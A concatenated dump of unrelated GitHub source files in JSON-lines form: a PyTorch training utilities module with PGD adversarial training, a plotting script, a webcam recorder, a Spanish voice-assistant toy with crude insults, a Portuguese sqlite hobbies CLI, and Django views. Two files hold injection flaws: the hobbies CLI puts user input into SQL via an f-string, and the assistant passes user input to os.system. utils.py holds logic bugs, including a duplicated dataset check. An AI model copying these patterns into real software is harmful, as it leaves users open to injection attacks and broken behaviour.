transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n cifar10_training = torchvision.datasets.CIFAR10(root=os.path.join(settings.DATA_PATH, 'CIFAR10'), train=True, download=True, transform=transform_train)\n cifar10_training_loader = DataLoader(\n cifar10_training, shuffle=shuffle, num_workers=num_workers, batch_size=batch_size)\n\n return cifar10_training_loader\n\ndef get_training_dataloader_cifar100(mean, std, batch_size=16, num_workers=8, shuffle=True):\n \"\"\" return training dataloader\n Args:\n mean: mean of cifar100 training dataset\n std: std of cifar100 training dataset\n path: path to cifar100 training python dataset\n batch_size: dataloader batchsize\n num_workers: dataloader num_works\n shuffle: whether to shuffle\n Returns: train_data_loader:torch dataloader object\n \"\"\"\n\n transform_train = transforms.Compose([\n #transforms.ToPILImage(),\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n cifar100_training = torchvision.datasets.CIFAR100(root=os.path.join(settings.DATA_PATH, 'CIFAR100'), train=True, download=True, transform=transform_train)\n cifar100_training_loader = DataLoader(\n cifar100_training, shuffle=shuffle, num_workers=num_workers, batch_size=batch_size)\n\n return cifar100_training_loader\n\ndef get_training_dataloader_tinyimagenet(mean, std, batch_size=16, num_workers=8, shuffle=True):\n\n transform_train = transforms.Compose([\n #transforms.ToPILImage(),\n transforms.RandomCrop(64, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n tinyimagenet_training = datasets.ImageFolder(os.path.join(settings.DATA_PATH, 'tiny-imagenet-200/train/'), transform=transform_train)\n tinyimagenet_training_loader = DataLoader(\n tinyimagenet_training, shuffle=shuffle, num_workers=num_workers, batch_size=batch_size)\n\n return tinyimagenet_training_loader\n\ndef get_training_dataloader(dataset, mean, std, batch_size=16, num_workers=8, shuffle=True):\n if dataset == 'cifar10':\n return get_training_dataloader_cifar10(mean=mean, std=std, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle)\n if dataset == 'cifar100':\n return get_training_dataloader_cifar100(mean=mean, std=std, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle)\n if dataset == 'cifar10':\n return get_training_dataloader_tinyimagenet(mean=mean, std=std, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle)\n\n\n\n\ndef get_test_dataloader_cifar10(mean, std, batch_size=16, num_workers=8, shuffle=False, pin_memory=True):\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n cifar10_test = torchvision.datasets.CIFAR10(root=os.path.join(settings.DATA_PATH, 'CIFAR10'), train=False, download=True, transform=transform_test)\n cifar10_test_loader = DataLoader(\n cifar10_test, shuffle=shuffle, num_workers=num_workers, pin_memory=pin_memory, batch_size=batch_size)\n\n return cifar10_test_loader\n\ndef get_test_dataloader_cifar100(mean, std, batch_size=16, num_workers=8, shuffle=True, pin_memory=True):\n \"\"\" return training dataloader\n Args:\n mean: mean of cifar100 test dataset\n std: std of cifar100 test dataset\n path: path to cifar100 test python dataset\n batch_size: dataloader batchsize\n num_workers: dataloader num_works\n shuffle: whether to shuffle\n Returns: cifar100_test_loader:torch dataloader object\n \"\"\"\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n cifar100_test = torchvision.datasets.CIFAR100(root=os.path.join(settings.DATA_PATH, 'CIFAR100'), train=False, download=True, transform=transform_test)\n cifar100_test_loader = DataLoader(\n cifar100_test, shuffle=shuffle, num_workers=num_workers, batch_size=batch_size, pin_memory=pin_memory)\n\n return cifar100_test_loader\n\ndef get_test_dataloader_tinyimagenet(mean, std, batch_size=16, num_workers=8, shuffle=True, pin_memory=True):\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n X_set, y_set = pickle.load(open(os.path.join(settings.DATA_PATH, 'TinyImagenet_test.pkl'), 'rb'))\n tinyimagenet_test = SubTrainDataset(X_set, list(y_set), transform=transform_test)\n tinyimagenet_test_loader = DataLoader(\n tinyimagenet_test, shuffle=shuffle, num_workers=num_workers, batch_size=batch_size, pin_memory=pin_memory)\n return tinyimagenet_test_loader\n\ndef get_test_dataloader(dataset, mean, std, batch_size=16, num_workers=8, shuffle=True, pin_memory=True):\n if dataset == 'cifar10':\n return get_test_dataloader_cifar10(mean=mean, std=std, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle, pin_memory=pin_memory)\n elif dataset == 'cifar100':\n return get_test_dataloader_cifar100(mean=mean, std=std, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle, pin_memory=pin_memory)\n if dataset == 'tinyimagenet':\n return get_test_dataloader_tinyimagenet(mean=mean, std=std, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle, pin_memory=pin_memory)\n\n######################################################################################\n# methods for loading sub-datasets for case-study of facial attribute classification.#\n######################################################################################\ndef get_subtraining_dataloader_facial_intersect(propor=0.6, batch_size=16, num_workers=8, shuffle=True):\n\n X_tensor, y_tensor = pickle.load(open(os.path.join(settings.DATA_PATH, 'facial_attribute', 'fairface_similarity', f'intersect_{propor}.pkl'), 'rb'))\n mean = X_tensor.mean(dim=[0, 2, 3])\n std = X_tensor.std(dim=[0, 2, 3])\n transform_train = transforms.Compose([\n #transforms.ToPILImage(),\n transforms.RandomCrop(128, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n # transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n tinyimagenet_training = SubTrainDataset(X_tensor, list(y_tensor), transform=transform_train)\n tinyimagenet_training_loader = DataLoader(\n tinyimagenet_training, shuffle=shuffle, \n num_workers=num_workers, batch_size=batch_size, pin_memory=True)\n\n return tinyimagenet_training_loader, mean, std, len(torch.unique(y_tensor))\n\ndef get_subtraining_dataloader_facial_mix(propor=0.6, batch_size=16, num_workers=8, shuffle=True):\n\n X_tensor, y_tensor = pickle.load(open(os.path.join(settings.DATA_PATH, 'facial_attribute', 'fairface_utk_mix', f'/intersect_{propor}.pkl'), 'rb'))\n mean = X_tensor.mean(dim=[0, 2, 3])\n std = X_tensor.std(dim=[0, 2, 3])\n transform_train = transforms.Compose([\n #transforms.ToPILImage(),\n transforms.RandomCrop(128, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n # transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n tinyimagenet_training = SubTrainDataset(X_tensor, list(y_tensor), transform=transform_train)\n tinyimagenet_training_loader = DataLoader(\n tinyimagenet_training, shuffle=shuffle, \n num_workers=num_workers, batch_size=batch_size, pin_memory=True)\n\n return tinyimagenet_training_loader, mean, std, len(torch.unique(y_tensor))\n\n\ndef get_facial_dataloader(inter_propor=0.6, batch_size=16, num_workers=8, shuffle=True, same_data_dist=True, adaptive_trans=\"gauss_color\", dst_ratio=1, seed=None):\n ''' \n same_data_dist means adversary data is of same distribution as the victim data, diff means the adversary data is of the different distribution.\n adaptve is a list, test for adaptive attacks\n '''\n X_tensor_list, y_tensor_list = [], []\n fair_train_img_set_tensor, fair_train_label_set = pickle.load(open(os.path.join(settings.DATA_PATH, \"facial_attribute\", \"fairface_set1_tensor.pkl\"), \"rb\"))\n # we first shrink the dataset (reduce the dataset size if dst_ratio is other than 1)\n fair_train_img_set_tensor = fair_train_img_set_tensor[::dst_ratio]\n fair_train_label_set = fair_train_label_set[::dst_ratio]\n set_num = len(fair_train_img_set_tensor)\n shift = int(inter_propor * set_num)\n\n print(f\"Sample id {set_num - shift} to id {set_num} from set1.\")\n X_tensor_list.append(fair_train_img_set_tensor[set_num - shift:])\n y_tensor_list.append(fair_train_label_set[set_num - shift:])\n \n\n if same_data_dist:\n print(\"The adversary has data of same distribution: sampling from FairFace data as the adversary data.\")\n fair_train_img_set_tensor_unrelated, fair_train_label_set_unrelated = pickle.load(open(os.path.join(settings.DATA_PATH, \"facial_attribute\", \"fairface_set_rest_tensor.pkl\"), \"rb\"))\n if seed is not None:\n # random sampling from unrelated data of same distribution\n np.random.seed(seed)\n idx = np.random.permutation(len(fair_train_img_set_tensor_unrelated))[:set_num - shift]\n # Here, the set_num is based on (shrinked, if dst_ratio != 1) dataset size, so we only randomly select the equal number of samples from unrelated data pool.\n X_tensor_list.append(fair_train_img_set_tensor_unrelated[idx])\n y_tensor_list.append(fair_train_label_set_unrelated[idx])\n else:\n X_tensor_list.append(fair_train_img_set_tensor_unrelated[::dst_ratio][:set_num - shift])\n y_tensor_list.append(fair_train_label_set_unrelated[::dst_ratio][:set_num - shift])\n else:\n print(\"The adversary has data of different distribution: sampling from UTK data as the adversary data.\")\n utk_train_img_set_tensor, utk_train_label_set = pickle.load(open(os.path.join(settings.DATA_PATH, \"facial_attribute\", \"utk_tensor.pkl\"), \"rb\"))\n X_tensor_list.append(utk_train_img_set_tensor[::dst_ratio][:set_num - shift])\n y_tensor_list.append(utk_train_label_set[::dst_ratio][:set_num - shift])\n \n print(f\"0 to {set_num - shift} from set2\")\n X_tensor, y_tensor = torch.cat(X_tensor_list), torch.cat(y_tensor_list)\n\n if not same_data_dist: # in this case, the adversary trains the model and can shift data's visual features by transformations.\n trans_list = []\n if 'gauss' in adaptive_trans:\n trans_list.append(transforms.GaussianBlur(kernel_size=15))\n if 'color' in adaptive_trans:\n trans_list.append(transforms.ColorJitter(brightness=0.2, contrast=0.2, saturation=0.2, hue=0.2))\n if len(trans_list) > 0:\n trans = transforms.Compose(trans_list)\n torch.manual_seed(seed)\n for i in tqdm(range(len(X_tensor))):\n X_tensor[i] = trans(X_tensor[i])\n\n mean, std = X_tensor.mean(dim=[0, 2, 3]), X_tensor.std(dim=[0, 2, 3])\n transform_train = transforms.Compose([\n transforms.RandomCrop(128, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n transforms.Normalize(mean, std)])\n tinyimagenet_training = SubTrainDataset(X_tensor, list(y_tensor), transform=transform_train)\n tinyimagenet_training_loader = torch.utils.data.DataLoader(\n tinyimagenet_training, shuffle=shuffle, \n num_workers=num_workers, batch_size=batch_size, pin_memory=True)\n\n return tinyimagenet_training_loader, mean, std, len(torch.unique(y_tensor))\n\n\n\ndef get_test_dataloader_facial(mean, std, batch_size=16, num_workers=8, shuffle=True, pin_memory=True):\n transform_test = transforms.Compose([\n # transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n X_tensor, y_tensor = pickle.load(open(os.path.join(settings.DATA_PATH, 'facial_attribute', 'fairface_val_tensor.pkl'), 'rb'))\n tinyimagenet_test = SubTrainDataset(X_tensor, y_tensor, transform=transform_test)\n tinyimagenet_test_loader = DataLoader(\n tinyimagenet_test, shuffle=shuffle, num_workers=num_workers, batch_size=batch_size, pin_memory=pin_memory)\n return tinyimagenet_test_loader\n\n\n\n\n\n###########################\n##### Load Networks #######\n###########################\n\ndef get_num_classes(dataset):\n if dataset == 'cifar10':\n return 10\n if dataset == 'cifar100':\n return 100\n if dataset == 'tinyimagenet':\n return 200\n\ndef get_network_cifar(netname, gpu, num_classes):\n \"\"\" return given network, architectures are based on kangliu's training code.\n check https://github.com/kuangliu/pytorch-cifar.\n \"\"\"\n if netname == 'vgg16':\n from models.vgg import vgg16_bn\n net = vgg16_bn(num_classes=num_classes)\n elif netname == 'vgg13':\n from models.vgg import vgg13_bn\n net = vgg13_bn(num_classes=num_classes)\n elif netname == 'vgg11':\n from models.vgg import vgg11_bn\n net = vgg11_bn(num_classes=num_classes)\n elif netname == 'vgg19':\n from models.vgg import vgg19_bn\n net = vgg19_bn(num_classes=num_classes)\n elif netname == 'densenet121':\n from models.densenet import densenet121\n net = densenet121(num_classes=num_classes)\n elif netname == 'densenet161':\n from models.densenet import densenet161\n net = densenet161(num_classes=num_classes)\n elif netname == 'densenet169':\n from models.densenet import densenet169\n net = densenet169(num_classes=num_classes)\n elif netname == 'densenet201':\n from models.densenet import densenet201\n net = densenet201(num_classes=num_classes)\n elif netname == 'resnet18':\n from models.resnet import resnet18\n net = resnet18(num_classes=num_classes)\n elif netname == 'resnet34':\n from models.resnet import resnet34\n net = resnet34(num_classes=num_classes)\n elif netname == 'resnet50':\n from models.resnet import resnet50\n net = resnet50(num_classes=num_classes)\n elif netname == 'resnet101':\n from models.resnet import resnet101\n net = resnet101(num_classes=num_classes)\n else:\n print('the network name you have entered is not supported yet')\n sys.exit()\n\n if gpu: #use_gpu\n net = net.cuda()\n\n return net\n\ndef get_network_torchvision(netname, gpu, num_classes):\n if netname == 'wideresnet101':\n from torchvision.models import wide_resnet101_2\n net = wide_resnet101_2(num_classes=num_classes)\n elif netname == 'densenet121':\n from torchvision.models import densenet121\n net = densenet121(num_classes=num_classes)\n elif netname == 'resnet152':\n from torchvision.models import resnet152\n net = resnet152(num_classes=num_classes)\n elif netname == 'resnet101':\n from torchvision.models import resnet101\n net = resnet101(num_classes=num_classes)\n elif netname == 'vgg19':\n from torchvision.models import vgg19_bn\n net = vgg19_bn(num_classes=num_classes)\n elif netname == 'mobilenet_v2':\n from torchvision.models import mobilenet_v2\n net = mobilenet_v2(num_classes=num_classes)\n elif netname == 'wide_resnet101_2':\n from torchvision.models import wide_resnet101_2\n net = wide_resnet101_2(num_classes=num_classes)\n \n else:\n print('the network name you have entered is not supported yet')\n sys.exit()\n\n if gpu: #use_gpu\n net = net.cuda()\n\n return net\n\ndef get_network(dataset, netname, gpu):\n num_classes = get_num_classes(dataset)\n if dataset.startswith('cifar'):\n return get_network_cifar(netname, gpu, num_classes)\n elif dataset == 'tinyimagenet':\n return get_network_torchvision(netname, gpu, num_classes)\n\n\n###########################\n####### Training ##########\n###########################\n\n\n\n\n\nclass WarmUpLR(_LRScheduler):\n \"\"\"warmup_training learning rate scheduler\n Args:\n optimizer: optimzier(e.g. SGD)\n total_iters: totoal_iters of warmup phase\n \"\"\"\n def __init__(self, optimizer, total_iters, last_epoch=-1):\n\n self.total_iters = total_iters\n super().__init__(optimizer, last_epoch)\n\n def get_lr(self):\n \"\"\"we will use the first m batches, and set the learning\n rate to base_lr * m / total_iters\n \"\"\"\n return [base_lr * self.last_epoch / (self.total_iters + 1e-8) for base_lr in self.base_lrs]\n\n\n\n##For adversarial training####\n\ndef PGD(x, loss_fn, y=None, model=None, eps=None, steps=3, gamma=None):\n\n # convert to cuda...\n x_adv = x.clone().cuda()\n # create an adv. example w. random init\n x_rand = torch.rand(x_adv.shape).cuda()\n x_adv += (2.0 * x_rand - 1.0) * eps\n x_adv.requires_grad_(True)\n # run steps\n for t in range(steps):\n out_adv_branch = model(x_adv) # use the main branch\n loss_adv = loss_fn(out_adv_branch, y)\n grad = torch.autograd.grad(loss_adv, x_adv, only_inputs=True)[0]\n\n x_adv.data.add_(gamma * torch.sign(grad.data))\n _linfball_projection(x, eps, x_adv, in_place=True)\n\n x_adv = torch.clamp(x_adv, 0, 1)\n return x_adv\n\ndef _linfball_projection(center, radius, t, in_place=True):\n min_range = center - radius\n max_range = center + radius\n if not in_place:\n res = t.clone()\n else:\n res = t\n idx = res.data < min_range\n res.data[idx] = min_range[idx]\n idx = res.data > max_range\n res.data[idx] = max_range[idx]\n return res\n\n\n\ndef train(epoch, net, training_loader, loss_function, optimizer, warmup_epoch=0, warmup_scheduler=None, adv_training=False, verbose=False):\n start = time.time()\n net.train()\n loss_epoch = 0\n correct = 0.0\n for batch_index, (images, labels) in enumerate(training_loader):\n labels, images = labels.cuda(), images.cuda()\n optimizer.zero_grad()\n outputs = net(images)\n loss = loss_function(outputs, labels)\n if adv_training and (np.random.rand() > 0.9):\n b_advx = PGD(images, loss_function, y=labels, model=net, eps=128/255., steps=1, gamma=1/255.).data.cuda()\n loss += loss_function(net(b_advx), labels)\n loss_epoch += loss.item() * len(labels)\n correct += outputs.argmax(dim=1).eq(labels).sum().item()\n loss.backward()\n optimizer.step()\n\n if epoch <= warmup_epoch and warmup_scheduler is not None:\n warmup_scheduler.step()\n if verbose:\n print(f\"Training Epoch: {epoch} [{batch_index * training_loader.batch_size + len(images)}/{len(training_loader.dataset)}]\\tLoss: \\\n {loss.item():0.4f}\\tLR: {optimizer.param_groups[0]['lr']:0.6f}\")\n finish = time.time()\n if verbose:\n print(f'Epoch {epoch} training time consumed: {finish - start:.2f}s')\n return loss_epoch / len(training_loader.dataset), correct / len(training_loader.dataset)\n\n\n\n\n\n@torch.no_grad()\ndef eval_training(epoch, net, test_loader, loss_function, verbose=False):\n start = time.time()\n net.eval()\n\n test_loss = 0.0 # cost function error\n correct = 0.0\n\n for (images, labels) in test_loader:\n images = images.cuda()\n labels = labels.cuda()\n\n outputs = net(images)\n loss = loss_function(outputs, labels)\n\n test_loss += loss.item()\n _, preds = outputs.max(1)\n correct += preds.eq(labels).sum()\n\n finish = time.time()\n if verbose:\n print(f'Test set: Epoch: {epoch}, Average loss: {test_loss / len(test_loader.dataset):.4f}, Accuracy: {correct.float() / len(test_loader.dataset):.4f}, Time consumed:{finish - start:.2f}s')\n return correct.float() / len(test_loader.dataset)\n\n\n","repo_name":"chichidd/RAI2","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":30747,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"22689616709","text":"import os\nimport numpy as np\nfrom posixpath import split\nimport sys\n\nfrom matplotlib.colors import LogNorm\nfrom matplotlib.colors import Normalize\nimport matplotlib.pyplot as plt\n\nclass MidpointNormalize(Normalize):\n\n def __init__(self, vmin=None, vmax=None, midpoint=None, clip=False):\n self.midpoint = midpoint\n Normalize.__init__(self, vmin, vmax, clip)\n\n def __call__(self, value, clip=None):\n x, y = [self.vmin, self.midpoint, self.vmax], [0, 0.5, 1]\n return np.ma.masked_array(np.interp(value, x, y))\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print(\"No file specified\")\n exit()\n\n log = False\n if len(sys.argv) == 3:\n if sys.argv[2] == \"log\":\n log = True\n\n filename = sys.argv[1]\n\n\n if not os.path.isfile(filename):\n print(\"File\", filename, \"does not exist\")\n exit()\n\n accuracy = []\n gamma = []\n C_val = []\n with(open(filename, 'r')) as f:\n lines = f.readlines()\n\n for l in lines:\n markers = l.split(\" \")\n\n g, c, acc = (x.split(\":\")[1] for x in markers[:3])\n accuracy.append(float(acc))\n gamma.append(float(g))\n C_val.append(float(c))\n\n\n x = list(set(gamma))\n y = list(set(C_val))\n\n x.sort()\n y.sort()\n\n accuracy = np.array(accuracy).reshape((len(x), len(y)))\n accuracy = np.rot90(accuracy, 1)\n #print(accuracy)\n\n plt.imshow(accuracy, cmap='hot', interpolation='nearest', \n extent=[min(x), max(x), min(y), max(y)], aspect='auto',\n norm=MidpointNormalize(vmin=0.986, midpoint=0.99))\n\n plt.xlabel(\"Gamma\")\n plt.ylabel(\"C\")\n\n plt.locator_params(axis='x', nbins=len(x))\n plt.locator_params(axis='y', nbins=len(y))\n\n if log:\n plt.xticks(np.arange(1, 11, step=10/len(x)), x)\n plt.yticks(np.arange(1, 11, step=10/len(y)), y)\n\n #plt.xlim(min(x), max(x))\n #plt.xscale('log')\n #plt.yscale('log')\n # plt.xticks(x)\n\n #plt.yticks(y)\n #plt.ylim(min(y), max(y))\n\n plt.colorbar()\n plt.show()","repo_name":"hellvetica42/FRST_HOG_SVM","sub_path":"logs/plotData.py","file_name":"plotData.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3295628470","text":"import cv2\r\n#####################Basic program\r\n\"\"\"\r\n###set the vediocapture\r\nimg=cv2.VideoCapture(0)\r\n\r\n#read the image that captured by the web cam\r\ncheck,frame=img.read()\r\n\r\n#check gives it is working fine or not\r\nprint(check)\r\n\r\n#show the image\r\ncv2.imshow(\"the\",frame)\r\ncv2.waitKey()\r\nprint(frame.shape)\r\n\r\n#relese the image that will turn off the web camera\r\nimg.release()\r\ncv2.destroyAllWindows()\r\nprint(check)\r\n\"\"\"\r\n#############more advanced capturing the vedio and write it in divice\r\nimg=cv2.VideoCapture(0)\r\nfourcc_code=cv2.VideoWriter_fourcc(*\"XVID\")\r\nvedio=cv2.VideoWriter(\"my_vedio.mp4\",fourcc_code,30,(640,480))\r\ncount=0\r\n#loop for continues capture\r\nwhile(True):\r\n count+=1\r\n check,frame=img.read()\r\n\r\n print(frame.shape)\r\n cv2.imshow(\"thefirtvedio\",frame)\r\n\r\n cv2.imwrite(\"img\"+str(count)+\".jpg\",frame)\r\n vedio.write(frame)\r\n if cv2.waitKey(1)==ord('a'):\r\n break\r\n\r\nvedio.release()\r\ncv2.destroyAllWindows()","repo_name":"pavi-ninjaac/OpenCV","sub_path":"readWrite_webCam.py","file_name":"readWrite_webCam.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37034367050","text":"#Thats a putisima idisima de holla\r\n\r\nimport random\r\nimport os\r\nimport sys\r\nimport time\r\nimport pyautogui\r\n\r\nversion = 0.1\r\nos.system('color 0d')\r\nos.system(\"cls\")\r\nmenu = \"\"\"\r\n************************\r\n\t\tWELCOME\r\n************************\r\n[Juego]\r\n[Trabajo]\r\n[Ideas]\r\n\"\"\"\r\n\r\ndef sistema(): \r\n\tpeticion = input(\"¿Que quieres aser? \")\r\n\tpeticion = peticion.lower()\r\n\tif peticion.find(\"juegos\") != -1 or peticion.find(\"jugar\") != -1:\r\n\t\tjuegos()\r\n\tif peticion.find(\"programar\") != -1 or peticion.find(\"trabajar\") != -1 or peticion.find(\"python\") != -1 or peticion.find(\"trabajo\") != -1:\r\n\t\ttrabajar()\r\n\tif peticion.find(\"idea\") != -1 or peticion.find(\"ideas\") != -1:\r\n\t\tideas()\r\n\tif peticion.find(\"dioso\") != -1 or peticion.find(\"exit\") != -1 or peticion.find(\"salir\") != -1:\r\n\t\tprint(\"Diosoooo bb\")\r\n\t\texit()\r\n\r\ndef juegos():\r\n\tgame = input(\"¿Que juego quieres jugar? \")\r\n\tgame = game.lower()\r\n\tif game.find(\"overwatch\") != -1:\r\n\t\tos.system(r\"C:\\Users\\borru\\Desktop\\Gertravis\\Juegos\\Overwatch.lnk\")\r\n\telif game.find(\"steam\") != -1:\r\n\t\tprint(\"comprate el disco de el juego en fisico k no lo puedo abrir XD \")\r\n\telif game.find(\"csgo\") != -1 or game.find(\"counter\") != -1:\r\n\t\tprint(\"comprate el disco de el juego en fisico k no lo puedo abrir XD \")\r\n\telif game.find(\"pubg\") != -1 or game.find(\"player\") != -1:\r\n\t\tprint(\"comprate el disco de el juego en fisico k no lo puedo abrir XD \")\r\n\telif game.find(\"sniper\") != -1 or game.find(\"ghost\") != -1 or game.find(\"warrior\") != -1:\r\n\t\tprint(\"comprate el disco de el juego en fisico k no lo puedo abrir XD \")\r\n\telse:\r\n\t\tprint(\"No he encontrado el juego en la base de datos, compratelo puto pobre de mierda PD: Fake bitch\")\r\n\r\n#Carala guapa.\r\ndef trabajar():\r\n\twork = input(\"¿Que quieres abrir? \")\r\n\twork = work.lower()\r\n\tif work.find(\"sublime\") != -1:\r\n\t\tos.system(\"sublime_text\")\r\n\r\n\tif work.find(\"google\") != -1 or work.find(\"chrome\") != -1:\r\n\t\tgo = input(\"¿Quieres entrar en alguna pagina en concreto? \")\r\n\t\tif go == \"si\" or go == \"s\" :\r\n\t\t\tww = input(\"¿Cual?: \")\r\n\t\t\tos.system(\"start chrome.exe \" + ww + \".com\")\r\n\t\telse:\r\n\t\t\tos.system(\"start chrome.exe www.google.com\")\r\n\r\ndef ideas():\r\n\tnideas = 0\r\n\tidea = input(\"Tienes una idea \")\r\n\tif idea != \"si\":\r\n\t\tdb = open(\"db.txt\", \"r\")\r\n\t\tprint(\"Estas son tus ideas: \")\r\n\t\tfor i in db:\r\n\t\t\t#numero de ideasssssssss\r\n\t\t\tnideas += 1\r\n\t\tdb.close()\r\n\t\tdb = open(\"db.txt\", \"r\")\r\n\r\n\t\tide = db.readlines()\r\n\t\tfor i in range(0,nideas):\r\n\t\t\tprint(ide[i])\r\n\r\n\telse:\r\n\t\tdb = open(\"db.txt\", \"a\")\r\n\t\tcarla = input(\"¿Cual es tu idea amorr? \")\r\n\t\tprint(\"Excelente idea guapo, la guardare en el fondo de mi corazon(en db.txt)\")\r\n\t\tdb.write(carla + \"\\n\")\t\r\nwhile True:\r\n\tprint(menu)\r\n\tsistema()\t","repo_name":"XaviBorrueco/GerTravis","sub_path":"ger.py","file_name":"ger.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34263242104","text":"import sqlite3\nimport emoji\nimport time\n\n\nconexao = sqlite3.connect('exercicio.db')\ncursor = conexao.cursor()\n\ndef insert_hobbies():\n cursor = conexao.cursor()\n selecao = cursor.execute('SELECT ID, NOME FROM PESSOAS')\n for selecione in selecao: \n print(f'ID: {selecione[0]} | NOME: {selecione[1]} ')\n \n pessoa_id = int(input('ESCOLHA O ID PARA ADICIONAR UM HOBBIE: '))\n hobbie = input(f'DESCREVA O HOBBIE DA PESSOA {pessoa_id}: ')\n sql = 'INSERT INTO HOBBIES (PESSOA_ID , HOBBY) VALUES (?, ?)'\n valor = [pessoa_id , hobbie]\n print('Dados inseridos com sucesso ! ')\n\n cursor.execute(sql, valor)\n conexao.commit()\n\n retornar_menu()\n\ndef pessoas_e_hobbies():\n cursor = conexao.cursor()\n print('LISTA DE PESSOAS E SEUS HOBBIES')\n sql = '''SELECT P.NOME, H.HOBBY \n FROM PESSOAS AS P \n INNER JOIN HOBBIES AS H ON P.ID = H.PESSOA_ID'''\n\n cursor.execute(sql)\n\n resultado = cursor.fetchall()\n\n for linha in resultado:\n nome_da_pessoa, hobby = linha\n print(f'Nome: {nome_da_pessoa} | Hobby: {hobby}')\n\n conexao.commit()\n \n retornar_menu()\n\ndef hobby_especifico():\n cursor = conexao.cursor()\n hobby_especifico = input('HOBBY: ')\n sql = '''SELECT P.NOME AS NomeDaPessoa\n FROM PESSOAS AS P \n INNER JOIN Hobbies AS H ON P.ID = H.PESSOA_ID\n WHERE H.Hobby = ? ;'''\n\n cursor.execute(sql, (hobby_especifico,))\n resultado = cursor.fetchall()\n\n print(f'Pessoas que possuem o hobbie de {hobby_especifico} ')\n for linha in resultado:\n nome_da_pessoa= linha[0]\n print(f'Nome: {nome_da_pessoa} ' )\n\n conexao.commit()\n \n retornar_menu()\n\ndef hobbies_em_comum():\n cursor = conexao.cursor()\n resultado = cursor.execute('SELECT NOME FROM PESSOAS')\n for result in resultado:\n print(f' NOME {result[0]}')\n \n nome = input('DIGITE O NOME DESEJADO: ')\n sql = f''' SELECT DISTINCT P.NOME FROM PESSOAS AS P INNER JOIN HOBBIES H\n ON P.ID = H.PESSOA_ID WHERE H.HOBBY IN \n (SELECT HOBBY FROM HOBBIES H \n INNER JOIN PESSOAS P ON P.ID= H.PESSOA_ID WHERE P.NOME = '{nome}')\n '''\n\n pessoas_hobbies_em_comum = cursor.execute(sql)\n print(F'PESSOAS COM HOBBIES EM COMUM COM {nome} ')\n\n for phc in pessoas_hobbies_em_comum:\n print(f'NOME: {phc[0]} ')\n \n conexao.commit()\n \n retornar_menu()\n\ndef retornar_menu():\n opcao = int(input('''Deseja retornar ao menu ? \n [1] Sim \n [2] Não \n Escolha um número: '''))\n\n \n if opcao == 1:\n menu()\n elif opcao == 2:\n sair()\n else: \n print('Opção inválida \\n')\n retornar_menu()\n\ndef sair():\n print('Saindo do programa em ')\n print('3')\n time.sleep(1)\n print('2')\n time.sleep(1)\n print('1')\n time.sleep(1)\n print(emoji.emojize('Até a próxima ! :waving_hand: ', language='en'))\n\n\ndef menu():\n opcao= int(input('''\n \"ESCOLHA UMA DAS OPÇÕES:\n [1] INSERIR HOBBY\n [2] LISTAR PESSOAS E HOBBIES\n [3] HOBBY ESPECÍFICO\n [4] PESSOAS COM HOBBY EM COMUM\n [0] SAIR\n \n QUAL OPÇÃO VOCÊ DESEJA? : ''' ))\n\n \n if opcao == 1:\n insert_hobbies()\n\n elif opcao == 2: \n pessoas_e_hobbies()\n\n elif opcao == 3:\n hobby_especifico()\n\n elif opcao == 4:\n hobbies_em_comum()\n\n elif opcao == 0:\n sair()\n\n else: \n print('Opção inválida \\n')\n menu()\n\n\nmenu()\n","repo_name":"Nandabdev/ConsultasSQL.py","sub_path":"hobbies.py","file_name":"hobbies.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"39351406695","text":"from django.db.models import Avg\nfrom django.shortcuts import render, get_object_or_404\n\nfrom .models import Book\n\n\n# Create your views here.\n\ndef index(request):\n books = Book.objects.all().order_by(\"title\")\n total_books = books.all().count()\n average_rating = books.aggregate(Avg(\"rating\"))\n return render(request, \"book_outlet/index.html\", {\n \"books\": books,\n \"total_books\": total_books,\n \"average_rating\": average_rating\n })\n\n\ndef book_details(request, slug):\n book = get_object_or_404(Book, slug=slug)\n return render(request, \"book_outlet/book_details.html\", {\n \"book\": book\n })\n","repo_name":"nikhilbadyal/django-book-store","sub_path":"book_outlet/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37039981230","text":"import PySimpleGUI as sg\nimport io\nimport base64\nfrom PIL import Image\nfrom tkinter import PhotoImage\nfrom time import time\n\ndef convert(image):\n # image = Image(image)\n with io.BytesIO() as output:\n image.save(output, 